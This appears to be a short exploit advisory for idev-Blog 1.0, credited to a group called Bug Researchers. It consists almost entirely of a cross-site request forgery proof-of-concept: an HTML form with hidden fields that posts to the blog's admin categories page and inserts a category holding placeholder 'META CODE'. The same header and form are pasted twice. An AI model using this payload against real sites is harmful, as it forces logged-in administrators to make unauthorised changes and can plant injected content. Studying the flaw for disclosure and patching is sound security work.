< ------------------- header data start ------------------- >
# Application Name : idev-Blog 1.0
# Vulnerable Type : XSRF
# Infection : META ADD
# Author : Tetrad0x // Bug Researchers
< ------------------- header data end of ------------------- >
<form action=http://TARGET//admin/index.php?page=categories method=post name=form id=form>
<input type=hidden name=controller value=CATEGORIES~insert~categories&catid=~ />
<table width=100% cellpadding=0 cellspacing=0 border=0>
<input type=hidden name=CATEGORY value=META CODE />
<input type=submit name=Submit value=Submit>
< -- bug code end of -- >
# Application Name : idev-Blog 1.0
# Vulnerable Type : XSRF
# Infection : META ADD
# Author : Tetrad0x // Bug Researchers
< ------------------- header data end of ------------------- >
<form action=http://TARGET//admin/index.php?page=categories method=post name=form id=form>
<input type=hidden name=controller value=CATEGORIES~insert~categories&catid=~ />
<table width=100% cellpadding=0 cellspacing=0 border=0>
<input type=hidden name=CATEGORY value=META CODE />
<input type=submit name=Submit value=Submit>
< -- bug code end of -- >